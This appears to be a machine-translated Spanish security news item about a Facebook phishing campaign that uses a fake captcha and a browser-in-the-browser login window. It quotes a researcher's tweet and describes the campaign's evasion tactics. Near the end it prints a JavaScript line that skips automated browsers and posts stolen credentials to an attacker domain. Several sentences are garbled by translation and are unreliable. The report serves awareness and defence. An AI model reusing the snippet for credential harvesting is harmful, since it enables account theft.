Una campaña en rápida evolución está utilizando una superposición de navegador en el navegador (BITB) para hacerse pasar por las credenciales de usuario de inicio de sesión y sifón de Facebook.
El señuelo depende de un desafío de captcha engañoso que se transforma perfectamente en una ventana de sesión de Facebook falsificada, engañando a las víctimas en escritorios y navegadores móviles por igual.
El malware surgió el 24 de julio de 2025 cuando múltiples cadenas de redirección comenzaron a poblar anuncios de redes sociales y sitios de WordPress comprometidos con un falso “¿Eres humano”? Pregunta que rutas a través de dominios como Recaptcha-Metahorizon (․) Com y FaceFBook (․) Com.
🚨fb alerta de phishing🚨
Captcha falso-> truco de navegador en el navegador
Los usuarios están siendo atacados por una novela @Facebook #phishing. Después de una redirección maliciosa, el sitio web muestra un #Fakecaptcha inmediato. Una vez hecho clic, aparece una ventana de inicio de sesión de Facebook de navegador en el navegador … pic.twitter.com/nwwzlfurcd
– Gen Amenazing Labs (@genthreatlabs) 24 de julio de 2025
Una vez que el usuario interactúa, se lanza una ventana BITB perfectamente desollada, completa con indicadores legítimos de Facebook SSL y una instantánea de barra de direcciones capturada a través de CSS para fomentar la confianza.
Página de inicio de sesión de Facebook falso (Fuente – X)
Analistas de laboratorios de amenazas de generación anotado que el HTML recolecta automáticamente los valores de nombre de usuario y contraseña a través de un evento inyectado en Submit, publicando las credenciales a una API controlada por el atacante antes de actualizar la página real de Facebook s. Compre para enmascarar la violación.
Su telemetría ya rastrea 500,000 intentos de exposición en América del Norte y el sudeste asiático, lo que subraya el alcance global de la operación.
A diferencia de los esfuerzos anteriores de BITB, esta variante aprovecha las funciones de borde alojadas en la nube para rotar la infraestructura por hora, las listas de bloques frustrantes y extendiendo el tiempo de permanencia de los hosts maliciosos.
Las empresas informan adquisiciones de cuentas secundarias y secuestro de la página de negocios que alimenta las estafas de la diversión de nómina y el robo de acreditación de anuncios, amplificando el radio de explosión mucho más allá de los perfiles personales.
Evasión de detección
La estrategia de evasión del malware se centra en JavaScript dinámico que armada la ventana. Propiedad aprobadora, borrando las verificaciones de origen tradicionales antes de que las herramientas de seguridad de punto final puedan inspeccionar el modelo de objeto de documento.
Cuando se incrusta dentro del iframe falsificado, el script también se arrastra para artefactos anti-bots, como las banderas de WebDriver o las extensiones de caja de arena, y aborta la ejecución en la detección, asegurando que los analistas reciban un bucle de captcha benigno.
if (! navigator.webdriver &&! window.chrome? fetch (‘https://loginpage-meta.com/api’, {método: ‘post’, cuerpo: creds}); }
Al limitar las exportaciones de telemetría a las solicitudes posteriores y al nivel de los dominios falsos en 60 minutos, los operadores minimizan los indicadores de red y pasan a través de las encierros web basadas en la firma.
Experimenta una detección de phishing más rápida y precisa y una protección mejorada para su negocio con análisis de sandbox en tiempo real-> Prueba cualquiera.
